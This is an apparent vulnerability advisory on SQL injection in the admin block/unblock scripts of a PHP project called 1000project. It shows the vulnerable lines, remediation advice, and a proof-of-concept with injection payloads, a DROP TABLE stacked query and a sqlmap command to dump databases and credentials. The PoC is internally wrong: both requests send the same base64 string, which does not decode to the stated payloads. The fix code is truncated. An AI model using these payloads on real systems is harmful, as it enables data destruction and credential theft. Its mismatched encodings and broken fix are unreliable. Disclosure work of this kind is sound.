1000project SQL Injection Vulnerability (CVSS 9.8) with POC and Fix

# CVE Report: 1000project User Block/Unblock SQL Injection #3 ## Vulnerability Overview * **Vulnerability Type**: SQL Injection (SQLi) * **Severity**: Critical (CVSS 3.1: 9.8) * **Affected Product**: 1000project (Portfolio Management System MCA) * **Affected Version**: 1.0 * **Root Cause**: The code directly concatenates parameters after `base64` decoding into a string without any parameterization or validation, allowing attackers to inject malicious SQL code. * **Key Characteristics**: * **Attack Vector**: Base64-encoded parameter injection * **Impact**: Unauthorized modification of user account status * **Authentication Requirement**: Requires an admin session (but can be bypassed) ## Scope of Impact * **Affected Components**: * `admin/block_status.php` * `admin/unblock_me.php` * **Specific Impacts**: 1. **Data Tampering**: Attackers can modify the block status of any user account. 2. **Account Takeover**: Combined with other vulnerabilities, attackers can take over user accounts. 3. **Privilege Escalation**: Previously blocked malicious accounts can be unblocked. 4. **Denial of Service**: Legitimate user accounts can be blocked, preventing them from logging in. 5. **Data Leakage**: Through SQL injection, attackers may access sensitive database information. ## Remediation 1. **Input Validation**: Validate base64 encoding format, check character whitelists, and perform type checks on decoded values. 2. **Use Prepared Statements**: Always use parameterized queries; never concatenate user input directly into SQL statements. 3. **Principle of Least Privilege**: Database users should have only the minimum necessary permissions, separating admin and application database users. 4. **Security Headers**: Add CSRF protection, implement request rate limiting, and add WAF rules. ## Vulnerable Code **File: admin/block_status.php:5-6** ```php $reg_id = base64_decode($_GET['q']); $sql = "update reg_details set block_status='1' where reg_id='$reg_id'"; ``` **File: admin/unblock_me.php:5-6** ```php $reg_id = base64_decode($_GET['q']); $sql = "update reg_details set block_status='0' where reg_id='$reg_id'"; ``` ## Recommended Fix **File: admin/block_status.php** ```php prepare("UPDATE reg_details SET block_status='1' WHERE reg_id = ?"); $stmt->bind_param("i", $reg_id); if ($stmt->execute() === TRUE) { $_SESSION['block'] = "User blocked successfully"; header("location:register_user.php"); } ?> ``` ## Proof of Concept (POC) **SQL Injection Attack** ```http # Malicious block request - Block all users GET /admin/block_status.php?q=bW9yZSBhdHRhY2s= HTTP/1.1 Host: target.com Cookie: PHPSESSID=admin_session # Decoded payload: 1' OR '1'='1 # Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1' OR '1'='1' ``` **SQL Operation Injection** ```http # More severe attack - SQL operation injection GET /admin/block_status.php?q=bW9yZSBhdHRhY2s= HTTP/1.1 Host: target.com Cookie: PHPSESSID=admin_session # Decoded payload: 1'; DROP TABLE reg_details; -- # Resulting SQL: UPDATE reg_details SET block_status='1' WHERE reg_id='1'; DROP TABLE reg_details; -- ``` **Impact Demonstration** ```bash # Automated attack using SQLmap sqlmap -u "http://target.com/admin/block_status.php?q=bW9yZSBhdHRhY2s=" \ --cookie="PHPSESSID=admin_session" \ --batch \ --level=5 \ --risk=3 # This will: # 1. Confirm SQL injection vulnerability # 2. Enumerate all databases # 3. Extract user credentials # 4. Potentially take control of the entire system ```

Goal Reached Thanks to every supporter — we hit 100%!

1000project SQL Injection Vulnerability (CVSS 9.8) with POC and Fix

More from this source